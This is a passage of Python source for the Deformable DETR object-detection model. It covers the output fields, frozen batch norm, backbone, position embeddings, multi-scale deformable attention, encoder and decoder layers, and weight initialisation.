A dictionary containing the individual losses. Useful for logging.
logits (`torch.FloatTensor` of shape `(batch_size, num_queries, num_classes + 1)`):
Classification logits (including no-object) for all queries.
pred_boxes (`torch.FloatTensor` of shape `(batch_size, num_queries, 4)`):
Normalized boxes coordinates for all queries, represented as (center_x, center_y, width, height). These
values are normalized in [0, 1], relative to the size of each individual image in the batch (disregarding
possible padding). You can use [`~DeformableDetrProcessor.post_process_object_detection`] to retrieve the
unnormalized bounding boxes.
auxiliary_outputs (`list[Dict]`, *optional*):
Optional, only returned when auxilary losses are activated (i.e. `config.auxiliary_loss` is set to `True`)
and labels are provided. It is a list of dictionaries containing the two above keys (`logits` and
`pred_boxes`) for each decoder layer.
last_hidden_state (`torch.FloatTensor` of shape `(batch_size, num_queries, hidden_size)`, *optional*):
Sequence of hidden-states at the output of the last layer of the decoder of the model.
decoder_hidden_states (`tuple(torch.FloatTensor)`, *optional*, returned when `output_hidden_states=True` is passed or when `config.output_hidden_states=True`):
Tuple of `torch.FloatTensor` (one for the output of the embeddings + one for the output of each layer) of
shape `(batch_size, num_queries, hidden_size)`. Hidden-states of the decoder at the output of each layer
plus the initial embedding outputs.
decoder_attentions (`tuple(torch.FloatTensor)`, *optional*, returned when `output_attentions=True` is passed or when `config.output_attentions=True`):
Tuple of `torch.FloatTensor` (one for each layer) of shape `(batch_size, num_heads, num_queries,
num_queries)`. Attentions weights of the decoder, after the attention softmax, used to compute the weighted
average in the self-attention heads.
cross_attentions (`tuple(torch.FloatTensor)`, *optional*, returned when `output_attentions=True` is passed or when `config.output_attentions=True`):
Tuple of `torch.FloatTensor` (one for each layer) of shape `(batch_size, num_queries, num_heads, 4, 4)`.
Attentions weights of the decoder's cross-attention layer, after the attention softmax, used to compute the
weighted average in the cross-attention heads.
encoder_last_hidden_state (`torch.FloatTensor` of shape `(batch_size, sequence_length, hidden_size)`, *optional*):
Sequence of hidden-states at the output of the last layer of the encoder of the model.
encoder_hidden_states (`tuple(torch.FloatTensor)`, *optional*, returned when `output_hidden_states=True` is passed or when `config.output_hidden_states=True`):
Tuple of `torch.FloatTensor` (one for the output of the embeddings + one for the output of each layer) of
shape `(batch_size, sequence_length, hidden_size)`. Hidden-states of the encoder at the output of each
layer plus the initial embedding outputs.
encoder_attentions (`tuple(torch.FloatTensor)`, *optional*, returned when `output_attentions=True` is passed or when `config.output_attentions=True`):
Tuple of `torch.FloatTensor` (one for each layer) of shape `(batch_size, sequence_length, num_heads, 4,
4)`. Attentions weights of the encoder, after the attention softmax, used to compute the weighted average
in the self-attention heads.
intermediate_hidden_states (`torch.FloatTensor` of shape `(batch_size, config.decoder_layers, num_queries, hidden_size)`):
Stacked intermediate hidden states (output of each layer of the decoder).
intermediate_reference_points (`torch.FloatTensor` of shape `(batch_size, config.decoder_layers, num_queries, 4)`):
Stacked intermediate reference points (reference points of each layer of the decoder).
init_reference_points (`torch.FloatTensor` of shape `(batch_size, num_queries, 4)`):
Initial reference points sent through the Transformer decoder.
enc_outputs_class (`torch.FloatTensor` of shape `(batch_size, sequence_length, config.num_labels)`, *optional*, returned when `config.with_box_refine=True` and `config.two_stage=True`):
Predicted bounding boxes scores where the top `config.two_stage_num_proposals` scoring bounding boxes are
picked as region proposals in the first stage. Output of bounding box binary classification (i.e.
foreground and background).
enc_outputs_coord_logits (`torch.FloatTensor` of shape `(batch_size, sequence_length, 4)`, *optional*, returned when `config.with_box_refine=True` and `config.two_stage=True`):
Logits of predicted bounding boxes coordinates in the first stage.
"""
loss: Optional[torch.FloatTensor] = None
loss_dict: Optional[Dict] = None
logits: torch.FloatTensor = None
pred_boxes: torch.FloatTensor = None
auxiliary_outputs: Optional[List[Dict]] = None
init_reference_points: Optional[torch.FloatTensor] = None
last_hidden_state: Optional[torch.FloatTensor] = None
intermediate_hidden_states: Optional[torch.FloatTensor] = None
intermediate_reference_points: Optional[torch.FloatTensor] = None
decoder_hidden_states: Optional[Tuple[torch.FloatTensor]] = None
decoder_attentions: Optional[Tuple[torch.FloatTensor]] = None
cross_attentions: Optional[Tuple[torch.FloatTensor]] = None
encoder_last_hidden_state: Optional[torch.FloatTensor] = None
encoder_hidden_states: Optional[Tuple[torch.FloatTensor]] = None
encoder_attentions: Optional[Tuple[torch.FloatTensor]] = None
enc_outputs_class: Optional = None
enc_outputs_coord_logits: Optional = None
def _get_clones(module, N):
return nn.ModuleList([copy.deepcopy(module) for i in range(N)])
def inverse_sigmoid(x, eps=1e-5):
x = x.clamp(min=0, max=1)
x1 = x.clamp(min=eps)
x2 = (1 - x).clamp(min=eps)
return torch.log(x1 / x2)
# Copied from transformers.models.detr.modeling_detr.DetrFrozenBatchNorm2d with Detr->DeformableDetr
class DeformableDetrFrozenBatchNorm2d(nn.Module):
"""
BatchNorm2d where the batch statistics and the affine parameters are fixed.
Copy-paste from torchvision.misc.ops with added eps before rqsrt, without which any other models than
torchvision.models.resnet[18,34,50,101] produce nans.
"""
def __init__(self, n):
super().__init__()
self.register_buffer("weight", torch.ones(n))
self.register_buffer("bias", torch.zeros(n))
self.register_buffer("running_mean", torch.zeros(n))
self.register_buffer("running_var", torch.ones(n))
def _load_from_state_dict(
self, state_dict, prefix, local_metadata, strict, missing_keys, unexpected_keys, error_msgs
):
num_batches_tracked_key = prefix + "num_batches_tracked"
if num_batches_tracked_key in state_dict:
del state_dict[num_batches_tracked_key]
super()._load_from_state_dict(
state_dict, prefix, local_metadata, strict, missing_keys, unexpected_keys, error_msgs
)
def forward(self, x):
# move reshapes to the beginning
# to make it user-friendly
weight = self.weight.reshape(1, -1, 1, 1)
bias = self.bias.reshape(1, -1, 1, 1)
running_var = self.running_var.reshape(1, -1, 1, 1)
running_mean = self.running_mean.reshape(1, -1, 1, 1)
epsilon = 1e-5
scale = weight * (running_var + epsilon).rsqrt()
bias = bias - running_mean * scale
return x * scale + bias
# Copied from transformers.models.detr.modeling_detr.replace_batch_norm with Detr->DeformableDetr
def replace_batch_norm(m, name=""):
for attr_str in dir(m):
target_attr = getattr(m, attr_str)
if isinstance(target_attr, nn.BatchNorm2d):
frozen = DeformableDetrFrozenBatchNorm2d(target_attr.num_features)
bn = getattr(m, attr_str)
frozen.weight.data.copy_(bn.weight)
frozen.bias.data.copy_(bn.bias)
frozen.running_mean.data.copy_(bn.running_mean)
frozen.running_var.data.copy_(bn.running_var)
setattr(m, attr_str, frozen)
for n, ch in m.named_children():
replace_batch_norm(ch, n)
class DeformableDetrConvEncoder(nn.Module):
"""
Convolutional backbone, using either the AutoBackbone API or one from the timm library.
nn.BatchNorm2d layers are replaced by DeformableDetrFrozenBatchNorm2d as defined above.
"""
def __init__(self, config):
super().__init__()
self.config = config
if config.use_timm_backbone:
requires_backends(self, ["timm"])
kwargs = {}
if config.dilation:
kwargs["output_stride"] = 16
backbone = create_model(
config.backbone,
pretrained=config.use_pretrained_backbone,
features_only=True,
out_indices=(2, 3, 4) if config.num_feature_levels > 1 else (4,),
in_chans=config.num_channels,
**kwargs,
)
else:
backbone = AutoBackbone.from_config(config.backbone_config)
# replace batch norm by frozen batch norm
with torch.no_grad():
replace_batch_norm(backbone)
self.model = backbone
self.intermediate_channel_sizes = (
self.model.feature_info.channels() if config.use_timm_backbone else self.model.channels
)
backbone_model_type = config.backbone if config.use_timm_backbone else config.backbone_config.model_type
if "resnet" in backbone_model_type:
for name, parameter in self.model.named_parameters():
if config.use_timm_backbone:
if "layer2" not in name and "layer3" not in name and "layer4" not in name:
parameter.requires_grad_(False)
else:
if "stage.1" not in name and "stage.2" not in name and "stage.3" not in name:
parameter.requires_grad_(False)
# Copied from transformers.models.detr.modeling_detr.DetrConvEncoder.forward with Detr->DeformableDetr
def forward(self, pixel_values: torch.Tensor, pixel_mask: torch.Tensor):
# send pixel_values through the model to get list of feature maps
features = self.model(pixel_values) if self.config.use_timm_backbone else self.model(pixel_values).feature_maps
out = []
for feature_map in features:
# downsample pixel_mask to match shape of corresponding feature_map
mask = nn.functional.interpolate(pixel_mask[None].float(), size=feature_map.shape[-2:]).to(torch.bool)[0]
out.append((feature_map, mask))
return out
# Copied from transformers.models.detr.modeling_detr.DetrConvModel with Detr->DeformableDetr
class DeformableDetrConvModel(nn.Module):
"""
This module adds 2D position embeddings to all intermediate feature maps of the convolutional encoder.
"""
def __init__(self, conv_encoder, position_embedding):
super().__init__()
self.conv_encoder = conv_encoder
self.position_embedding = position_embedding
def forward(self, pixel_values, pixel_mask):
# send pixel_values and pixel_mask through backbone to get list of (feature_map, pixel_mask) tuples
out = self.conv_encoder(pixel_values, pixel_mask)
pos = []
for feature_map, mask in out:
# position encoding
pos.append(self.position_embedding(feature_map, mask).to(feature_map.dtype))
return out, pos
# Copied from transformers.models.detr.modeling_detr._expand_mask
def _expand_mask(mask: torch.Tensor, dtype: torch.dtype, target_len: Optional[int] = None):
"""
Expands attention_mask from `[batch_size, seq_len]` to `[batch_size, 1, target_seq_len, source_seq_len]`.
"""
batch_size, source_len = mask.size()
target_len = target_len if target_len is not None else source_len
expanded_mask = mask[:, None, None, :].expand(batch_size, 1, target_len, source_len).to(dtype)
inverted_mask = 1.0 - expanded_mask
return inverted_mask.masked_fill(inverted_mask.bool(), torch.finfo(dtype).min)
class DeformableDetrSinePositionEmbedding(nn.Module):
"""
This is a more standard version of the position embedding, very similar to the one used by the Attention is all you
need paper, generalized to work on images.
"""
def __init__(self, embedding_dim=64, temperature=10000, normalize=False, scale=None):
super().__init__()
self.embedding_dim = embedding_dim
self.temperature = temperature
self.normalize = normalize
if scale is not None and normalize is False:
raise ValueError("normalize should be True if scale is passed")
if scale is None:
scale = 2 * math.pi
self.scale = scale
def forward(self, pixel_values, pixel_mask):
if pixel_mask is None:
raise ValueError("No pixel mask provided")
y_embed = pixel_mask.cumsum(1, dtype=torch.float32)
x_embed = pixel_mask.cumsum(2, dtype=torch.float32)
if self.normalize:
eps = 1e-6
y_embed = (y_embed - 0.5) / (y_embed[:, -1:, :] + eps) * self.scale
x_embed = (x_embed - 0.5) / (x_embed[:, :, -1:] + eps) * self.scale
dim_t = torch.arange(self.embedding_dim, dtype=torch.float32, device=pixel_values.device)
dim_t = self.temperature ** (2 * torch_int_div(dim_t, 2 / self.embedding_dim))
pos_x = x_embed[:, :, :, None] / dim_t
pos_y = y_embed[:, :, :, None] / dim_t
pos_x = torch.stack((pos_x[:, :, :, 0::2].sin(), pos_x[:, :, :, 1::2].cos()), dim=4).flatten(3)
pos_y = torch.stack((pos_y[:, :, :, 0::2].sin(), pos_y[:, :, :, 1::2].cos()), dim=4).flatten(3)
pos = torch.cat((pos_y, pos_x), dim=3).permute(0, 3, 1, 2)
return pos
# Copied from transformers.models.detr.modeling_detr.DetrLearnedPositionEmbedding
class DeformableDetrLearnedPositionEmbedding(nn.Module):
"""
This module learns positional embeddings up to a fixed maximum size.
"""
def __init__(self, embedding_dim=256):
super().__init__()
self.row_embeddings = nn.Embedding(50, embedding_dim)
self.column_embeddings = nn.Embedding(50, embedding_dim)
def forward(self, pixel_values, pixel_mask=None):
height, width = pixel_values.shape[-2:]
width_values = torch.arange(width, device=pixel_values.device)
height_values = torch.arange(height, device=pixel_values.device)
x_emb = self.column_embeddings(width_values)
y_emb = self.row_embeddings(height_values)
pos = torch.cat([x_emb.unsqueeze(0).repeat(height, 1, 1), y_emb.unsqueeze(1).repeat(1, width, 1)], dim=-1)
pos = pos.permute(2, 0, 1)
pos = pos.unsqueeze(0)
pos = pos.repeat(pixel_values.shape[0], 1, 1, 1)
return pos
# Copied from transformers.models.detr.modeling_detr.build_position_encoding with Detr->DeformableDetr
def build_position_encoding(config):
n_steps = config.d_model // 2
if config.position_embedding_type == "sine":
# TODO find a better way of exposing other arguments
position_embedding = DeformableDetrSinePositionEmbedding(n_steps, normalize=True)
elif config.position_embedding_type == "learned":
position_embedding = DeformableDetrLearnedPositionEmbedding(n_steps)
else:
raise ValueError(f"Not supported {config.position_embedding_type}")
return position_embedding
def multi_scale_deformable_attention(
value: Tensor, value_spatial_shapes: Tensor, sampling_locations: Tensor, attention_weights: Tensor
) -> Tensor:
batch_size, _, num_heads, hidden_dim = value.shape
_, num_queries, num_heads, num_levels, num_points, _ = sampling_locations.shape
value_list = value.split([height * width for height, width in value_spatial_shapes], dim=1)
sampling_grids = 2 * sampling_locations - 1
sampling_value_list = []
for level_id, (height, width) in enumerate(value_spatial_shapes):
# batch_size, height*width, num_heads, hidden_dim
# -> batch_size, height*width, num_heads*hidden_dim
# -> batch_size, num_heads*hidden_dim, height*width
# -> batch_size*num_heads, hidden_dim, height, width
value_l_ = (
value_list[level_id].flatten(2).transpose(1, 2).reshape(batch_size * num_heads, hidden_dim, height, width)
)
# batch_size, num_queries, num_heads, num_points, 2
# -> batch_size, num_heads, num_queries, num_points, 2
# -> batch_size*num_heads, num_queries, num_points, 2
sampling_grid_l_ = sampling_grids[:, :, :, level_id].transpose(1, 2).flatten(0, 1)
# batch_size*num_heads, hidden_dim, num_queries, num_points
sampling_value_l_ = nn.functional.grid_sample(
value_l_, sampling_grid_l_, mode="bilinear", padding_mode="zeros", align_corners=False
)
sampling_value_list.append(sampling_value_l_)
# (batch_size, num_queries, num_heads, num_levels, num_points)
# -> (batch_size, num_heads, num_queries, num_levels, num_points)
# -> (batch_size, num_heads, 1, num_queries, num_levels*num_points)
attention_weights = attention_weights.transpose(1, 2).reshape(
batch_size * num_heads, 1, num_queries, num_levels * num_points
)
output = (
(torch.stack(sampling_value_list, dim=-2).flatten(-2) * attention_weights)
.sum(-1)
.view(batch_size, num_heads * hidden_dim, num_queries)
)
return output.transpose(1, 2).contiguous()
class DeformableDetrMultiscaleDeformableAttention(nn.Module):
"""
Multiscale deformable attention as proposed in Deformable DETR.
"""
def __init__(self, embed_dim: int, num_heads: int, n_levels: int, n_points: int):
super().__init__()
if embed_dim % num_heads != 0:
raise ValueError(
f"embed_dim (d_model) must be divisible by num_heads, but got {embed_dim} and {num_heads}"
)
dim_per_head = embed_dim // num_heads
# check if dim_per_head is power of 2
if not ((dim_per_head & (dim_per_head - 1) == 0) and dim_per_head != 0):
warnings.warn(
"You'd better set embed_dim (d_model) in DeformableDetrMultiscaleDeformableAttention to make the"
" dimension of each attention head a power of 2 which is more efficient in the authors' CUDA"
" implementation."
)
self.im2col_step = 64
self.d_model = embed_dim
self.n_levels = n_levels
self.n_heads = num_heads
self.n_points = n_points
self.sampling_offsets = nn.Linear(embed_dim, num_heads * n_levels * n_points * 2)
self.attention_weights = nn.Linear(embed_dim, num_heads * n_levels * n_points)
self.value_proj = nn.Linear(embed_dim, embed_dim)
self.output_proj = nn.Linear(embed_dim, embed_dim)
self._reset_parameters()
def _reset_parameters(self):
nn.init.constant_(self.sampling_offsets.weight.data, 0.0)
thetas = torch.arange(self.n_heads, dtype=torch.float32) * (2.0 * math.pi / self.n_heads)
grid_init = torch.stack([thetas.cos(), thetas.sin()], -1)
grid_init = (
(grid_init / grid_init.abs().max(-1, keepdim=True)[0])
.view(self.n_heads, 1, 1, 2)
.repeat(1, self.n_levels, self.n_points, 1)
)
for i in range(self.n_points):
grid_init[:, :, i, :] *= i + 1
with torch.no_grad():
self.sampling_offsets.bias = nn.Parameter(grid_init.view(-1))
nn.init.constant_(self.attention_weights.weight.data, 0.0)
nn.init.constant_(self.attention_weights.bias.data, 0.0)
nn.init.xavier_uniform_(self.value_proj.weight.data)
nn.init.constant_(self.value_proj.bias.data, 0.0)
nn.init.xavier_uniform_(self.output_proj.weight.data)
nn.init.constant_(self.output_proj.bias.data, 0.0)
def with_pos_embed(self, tensor: torch.Tensor, position_embeddings: Optional[Tensor]):
return tensor if position_embeddings is None else tensor + position_embeddings
def forward(
self,
hidden_states: torch.Tensor,
attention_mask: Optional[torch.Tensor] = None,
encoder_hidden_states=None,
encoder_attention_mask=None,
position_embeddings: Optional[torch.Tensor] = None,
reference_points=None,
spatial_shapes=None,
level_start_index=None,
output_attentions: bool = False,
):
# add position embeddings to the hidden states before projecting to queries and keys
if position_embeddings is not None:
hidden_states = self.with_pos_embed(hidden_states, position_embeddings)
batch_size, num_queries, _ = hidden_states.shape
batch_size, sequence_length, _ = encoder_hidden_states.shape
if (spatial_shapes[:, 0] * spatial_shapes[:, 1]).sum() != sequence_length:
raise ValueError(
"Make sure to align the spatial shapes with the sequence length of the encoder hidden states"
)
value = self.value_proj(encoder_hidden_states)
if attention_mask is not None:
# we invert the attention_mask
value = value.masked_fill(~attention_mask[..., None], float(0))
value = value.view(batch_size, sequence_length, self.n_heads, self.d_model // self.n_heads)
sampling_offsets = self.sampling_offsets(hidden_states).view(
batch_size, num_queries, self.n_heads, self.n_levels, self.n_points, 2
)
attention_weights = self.attention_weights(hidden_states).view(
batch_size, num_queries, self.n_heads, self.n_levels * self.n_points
)
attention_weights = F.softmax(attention_weights, -1).view(
batch_size, num_queries, self.n_heads, self.n_levels, self.n_points
)
# batch_size, num_queries, n_heads, n_levels, n_points, 2
if reference_points.shape[-1] == 2:
offset_normalizer = torch.stack([spatial_shapes[..., 1], spatial_shapes[..., 0]], -1)
sampling_locations = (
reference_points[:, :, None, :, None, :]
+ sampling_offsets / offset_normalizer[None, None, None, :, None, :]
)
elif reference_points.shape[-1] == 4:
sampling_locations = (
reference_points[:, :, None, :, None, :2]
+ sampling_offsets / self.n_points * reference_points[:, :, None, :, None, 2:] * 0.5
)
else:
raise ValueError(f"Last dim of reference_points must be 2 or 4, but got {reference_points.shape[-1]}")
try:
# custom kernel
output = MultiScaleDeformableAttentionFunction.apply(
value,
spatial_shapes,
level_start_index,
sampling_locations,
attention_weights,
self.im2col_step,
)
except Exception:
# PyTorch implementation
output = multi_scale_deformable_attention(value, spatial_shapes, sampling_locations, attention_weights)
output = self.output_proj(output)
return output, attention_weights
class DeformableDetrMultiheadAttention(nn.Module):
"""
Multi-headed attention from 'Attention Is All You Need' paper.
Here, we add position embeddings to the queries and keys (as explained in the Deformable DETR paper).
"""
def __init__(
self,
embed_dim: int,
num_heads: int,
dropout: float = 0.0,
bias: bool = True,
):
super().__init__()
self.embed_dim = embed_dim
self.num_heads = num_heads
self.dropout = dropout
self.head_dim = embed_dim // num_heads
if self.head_dim * num_heads != self.embed_dim:
raise ValueError(
f"embed_dim must be divisible by num_heads (got `embed_dim`: {self.embed_dim} and `num_heads`:"
f" {num_heads})."
)
self.scaling = self.head_dim**-0.5
self.k_proj = nn.Linear(embed_dim, embed_dim, bias=bias)
self.v_proj = nn.Linear(embed_dim, embed_dim, bias=bias)
self.q_proj = nn.Linear(embed_dim, embed_dim, bias=bias)
self.out_proj = nn.Linear(embed_dim, embed_dim, bias=bias)
def _shape(self, tensor: torch.Tensor, seq_len: int, batch_size: int):
return tensor.view(batch_size, seq_len, self.num_heads, self.head_dim).transpose(1, 2).contiguous()
def with_pos_embed(self, tensor: torch.Tensor, position_embeddings: Optional[Tensor]):
return tensor if position_embeddings is None else tensor + position_embeddings
def forward(
self,
hidden_states: torch.Tensor,
attention_mask: Optional[torch.Tensor] = None,
position_embeddings: Optional[torch.Tensor] = None,
output_attentions: bool = False,
) -> Tuple[torch.Tensor, Optional[torch.Tensor], Optional[Tuple[torch.Tensor]]]:
"""Input shape: Batch x Time x Channel"""
batch_size, target_len, embed_dim = hidden_states.size()
# add position embeddings to the hidden states before projecting to queries and keys
if position_embeddings is not None:
hidden_states_original = hidden_states
hidden_states = self.with_pos_embed(hidden_states, position_embeddings)
# get queries, keys and values
query_states = self.q_proj(hidden_states) * self.scaling
key_states = self._shape(self.k_proj(hidden_states), -1, batch_size)
value_states = self._shape(self.v_proj(hidden_states_original), -1, batch_size)
proj_shape = (batch_size * self.num_heads, -1, self.head_dim)
query_states = self._shape(query_states, target_len, batch_size).view(*proj_shape)
key_states = key_states.view(*proj_shape)
value_states = value_states.view(*proj_shape)
source_len = key_states.size(1)
attn_weights = torch.bmm(query_states, key_states.transpose(1, 2))
if attn_weights.size() != (batch_size * self.num_heads, target_len, source_len):
raise ValueError(
f"Attention weights should be of size {(batch_size * self.num_heads, target_len, source_len)}, but is"
f" {attn_weights.size()}"
)
# expand attention_mask
if attention_mask is not None:
# [batch_size, seq_len] -> [batch_size, 1, target_seq_len, source_seq_len]
attention_mask = _expand_mask(attention_mask, hidden_states.dtype)
if attention_mask is not None:
if attention_mask.size() != (batch_size, 1, target_len, source_len):
raise ValueError(
f"Attention mask should be of size {(batch_size, 1, target_len, source_len)}, but is"
f" {attention_mask.size()}"
)
attn_weights = attn_weights.view(batch_size, self.num_heads, target_len, source_len) + attention_mask
attn_weights = attn_weights.view(batch_size * self.num_heads, target_len, source_len)
attn_weights = nn.functional.softmax(attn_weights, dim=-1)
if output_attentions:
# this operation is a bit awkward, but it's required to
# make sure that attn_weights keeps its gradient.
# In order to do so, attn_weights have to reshaped
# twice and have to be reused in the following
attn_weights_reshaped = attn_weights.view(batch_size, self.num_heads, target_len, source_len)
attn_weights = attn_weights_reshaped.view(batch_size * self.num_heads, target_len, source_len)
else:
attn_weights_reshaped = None
attn_probs = nn.functional.dropout(attn_weights, p=self.dropout, training=self.training)
attn_output = torch.bmm(attn_probs, value_states)
if attn_output.size() != (batch_size * self.num_heads, target_len, self.head_dim):
raise ValueError(
f"`attn_output` should be of size {(batch_size, self.num_heads, target_len, self.head_dim)}, but is"
f" {attn_output.size()}"
)
attn_output = attn_output.view(batch_size, self.num_heads, target_len, self.head_dim)
attn_output = attn_output.transpose(1, 2)
attn_output = attn_output.reshape(batch_size, target_len, embed_dim)
attn_output = self.out_proj(attn_output)
return attn_output, attn_weights_reshaped
class DeformableDetrEncoderLayer(nn.Module):
def __init__(self, config: DeformableDetrConfig):
super().__init__()
self.embed_dim = config.d_model
self.self_attn = DeformableDetrMultiscaleDeformableAttention(
embed_dim=self.embed_dim,
num_heads=config.encoder_attention_heads,
n_levels=config.num_feature_levels,
n_points=config.encoder_n_points,
)
self.self_attn_layer_norm = nn.LayerNorm(self.embed_dim)
self.dropout = config.dropout
self.activation_fn = ACT2FN[config.activation_function]
self.activation_dropout = config.activation_dropout
self.fc1 = nn.Linear(self.embed_dim, config.encoder_ffn_dim)
self.fc2 = nn.Linear(config.encoder_ffn_dim, self.embed_dim)
self.final_layer_norm = nn.LayerNorm(self.embed_dim)
def forward(
self,
hidden_states: torch.Tensor,
attention_mask: torch.Tensor,
position_embeddings: torch.Tensor = None,
reference_points=None,
spatial_shapes=None,
level_start_index=None,
output_attentions: bool = False,
):
"""
Args:
hidden_states (`torch.FloatTensor` of shape `(batch_size, sequence_length, hidden_size)`):
Input to the layer.
attention_mask (`torch.FloatTensor` of shape `(batch_size, sequence_length)`):
Attention mask.
position_embeddings (`torch.FloatTensor`, *optional*):
Position embeddings, to be added to `hidden_states`.
reference_points (`torch.FloatTensor`, *optional*):
Reference points.
spatial_shapes (`torch.LongTensor`, *optional*):
Spatial shapes of the backbone feature maps.
level_start_index (`torch.LongTensor`, *optional*):
Level start index.
output_attentions (`bool`, *optional*):
Whether or not to return the attentions tensors of all attention layers. See `attentions` under
returned tensors for more detail.
"""
residual = hidden_states
# Apply Multi-scale Deformable Attention Module on the multi-scale feature maps.
hidden_states, attn_weights = self.self_attn(
hidden_states=hidden_states,
attention_mask=attention_mask,
encoder_hidden_states=hidden_states,
encoder_attention_mask=attention_mask,
position_embeddings=position_embeddings,
reference_points=reference_points,
spatial_shapes=spatial_shapes,
level_start_index=level_start_index,
output_attentions=output_attentions,
)
hidden_states = nn.functional.dropout(hidden_states, p=self.dropout, training=self.training)
hidden_states = residual + hidden_states
hidden_states = self.self_attn_layer_norm(hidden_states)
residual = hidden_states
hidden_states = self.activation_fn(self.fc1(hidden_states))
hidden_states = nn.functional.dropout(hidden_states, p=self.activation_dropout, training=self.training)
hidden_states = self.fc2(hidden_states)
hidden_states = nn.functional.dropout(hidden_states, p=self.dropout, training=self.training)
hidden_states = residual + hidden_states
hidden_states = self.final_layer_norm(hidden_states)
if self.training:
if torch.isinf(hidden_states).any() or torch.isnan(hidden_states).any():
clamp_value = torch.finfo(hidden_states.dtype).max - 1000
hidden_states = torch.clamp(hidden_states, min=-clamp_value, max=clamp_value)
outputs = (hidden_states,)
if output_attentions:
outputs += (attn_weights,)
return outputs
class DeformableDetrDecoderLayer(nn.Module):
def __init__(self, config: DeformableDetrConfig):
super().__init__()
self.embed_dim = config.d_model
# self-attention
self.self_attn = DeformableDetrMultiheadAttention(
embed_dim=self.embed_dim,
num_heads=config.decoder_attention_heads,
dropout=config.attention_dropout,
)
self.dropout = config.dropout
self.activation_fn = ACT2FN[config.activation_function]
self.activation_dropout = config.activation_dropout
self.self_attn_layer_norm = nn.LayerNorm(self.embed_dim)
# cross-attention
self.encoder_attn = DeformableDetrMultiscaleDeformableAttention(
embed_dim=self.embed_dim,
num_heads=config.decoder_attention_heads,
n_levels=config.num_feature_levels,
n_points=config.decoder_n_points,
)
self.encoder_attn_layer_norm = nn.LayerNorm(self.embed_dim)
# feedforward neural networks
self.fc1 = nn.Linear(self.embed_dim, config.decoder_ffn_dim)
self.fc2 = nn.Linear(config.decoder_ffn_dim, self.embed_dim)
self.final_layer_norm = nn.LayerNorm(self.embed_dim)
def forward(
self,
hidden_states: torch.Tensor,
position_embeddings: Optional[torch.Tensor] = None,
reference_points=None,
spatial_shapes=None,
level_start_index=None,
encoder_hidden_states: Optional[torch.Tensor] = None,
encoder_attention_mask: Optional[torch.Tensor] = None,
output_attentions: Optional[bool] = False,
):
"""
Args:
hidden_states (`torch.FloatTensor`):
Input to the layer of shape `(seq_len, batch, embed_dim)`.
position_embeddings (`torch.FloatTensor`, *optional*):
Position embeddings that are added to the queries and keys in the self-attention layer.
reference_points (`torch.FloatTensor`, *optional*):
Reference points.
spatial_shapes (`torch.LongTensor`, *optional*):
Spatial shapes.
level_start_index (`torch.LongTensor`, *optional*):
Level start index.
encoder_hidden_states (`torch.FloatTensor`):
cross attention input to the layer of shape `(seq_len, batch, embed_dim)`
encoder_attention_mask (`torch.FloatTensor`): encoder attention mask of size
`(batch, 1, target_len, source_len)` where padding elements are indicated by very large negative
values.
output_attentions (`bool`, *optional*):
Whether or not to return the attentions tensors of all attention layers. See `attentions` under
returned tensors for more detail.
"""
residual = hidden_states
# Self Attention
hidden_states, self_attn_weights = self.self_attn(
hidden_states=hidden_states,
position_embeddings=position_embeddings,
output_attentions=output_attentions,
)
hidden_states = nn.functional.dropout(hidden_states, p=self.dropout, training=self.training)
hidden_states = residual + hidden_states
hidden_states = self.self_attn_layer_norm(hidden_states)
second_residual = hidden_states
# Cross-Attention
cross_attn_weights = None
hidden_states, cross_attn_weights = self.encoder_attn(
hidden_states=hidden_states,
attention_mask=encoder_attention_mask,
encoder_hidden_states=encoder_hidden_states,
encoder_attention_mask=encoder_attention_mask,
position_embeddings=position_embeddings,
reference_points=reference_points,
spatial_shapes=spatial_shapes,
level_start_index=level_start_index,
output_attentions=output_attentions,
)
hidden_states = nn.functional.dropout(hidden_states, p=self.dropout, training=self.training)
hidden_states = second_residual + hidden_states
hidden_states = self.encoder_attn_layer_norm(hidden_states)
# Fully Connected
residual = hidden_states
hidden_states = self.activation_fn(self.fc1(hidden_states))
hidden_states = nn.functional.dropout(hidden_states, p=self.activation_dropout, training=self.training)
hidden_states = self.fc2(hidden_states)
hidden_states = nn.functional.dropout(hidden_states, p=self.dropout, training=self.training)
hidden_states = residual + hidden_states
hidden_states = self.final_layer_norm(hidden_states)
outputs = (hidden_states,)
if output_attentions:
outputs += (self_attn_weights, cross_attn_weights)
return outputs
# Copied from transformers.models.detr.modeling_detr.DetrClassificationHead
class DeformableDetrClassificationHead(nn.Module):
"""Head for sentence-level classification tasks."""
def __init__(self, input_dim: int, inner_dim: int, num_classes: int, pooler_dropout: float):
super().__init__()
self.dense = nn.Linear(input_dim, inner_dim)
self.dropout = nn.Dropout(p=pooler_dropout)
self.out_proj = nn.Linear(inner_dim, num_classes)
def forward(self, hidden_states: torch.Tensor):
hidden_states = self.dropout(hidden_states)
hidden_states = self.dense(hidden_states)
hidden_states = torch.tanh(hidden_states)
hidden_states = self.dropout(hidden_states)
hidden_states = self.out_proj(hidden_states)
return hidden_states
class DeformableDetrPreTrainedModel(PreTrainedModel):
config_class = DeformableDetrConfig
base_model_prefix = "model"
main_input_name = "pixel_values"
def _init_weights(self, module):
std = self.config.init_std
if isinstance(module, DeformableDetrLearnedPositionEmbedding):
nn.init.uniform_(module.row_embeddings.weight)
nn.init.uniform_(module.column_embeddings.weight)
elif isinstance(module, DeformableDetrMultiscaleDeformableAttention):
module._reset_parameters()
elif isinstance(module, (nn.Linear, nn.Conv2d, nn.BatchNorm2d)):
# Slightly different from the TF version which uses truncated_normal for initialization
# cf https://github.com/pytorch/pytorch/pull/5617
module.weight.data.normal_(mean=0.0, std=std)
if module.bias is not None:
module.bias.data.zero_()
elif isinstance(module, nn.Embedding):
module.weight.data.normal_(mean=0.0, std=std)
if module.padding_idx is not None:
module.weight.data[module.padding_idx].zero_()
if hasattr(module, "reference_points") and not self.config.two_stage:
nn.init.xavier_uniform_(module.reference_points.weight.data, gain=1.0)
nn.init.constant_(module.reference_points.bias.data, 0.0)
if hasattr(module, "level_embed"):
nn.init.normal_(module.level_embed)
def _set_gradient_checkpointing(self, module, value=False):
if isinstance(module, DeformableDetrDecoder):
module.gradient_checkpointing = value
DEFORMABLE_DETR_START_DOCSTRING = r"""
This model inherits from [`PreTrainedModel`]. Check the superclass documentation for the generic methods the
library implements for all its model (such as downloading or saving, resizing the input embeddings, pruning heads
etc.)
This model is also a PyTorch [torch.nn.Module](https://pytorch.org/docs/stable/nn.html#torch.nn.Module) subclass.
Use it as a regular PyTorch Module and refer to the PyTorch documentation for all matter related to general usage
and behavior.
Parameters:
config ([`DeformableDetrConfig`]):
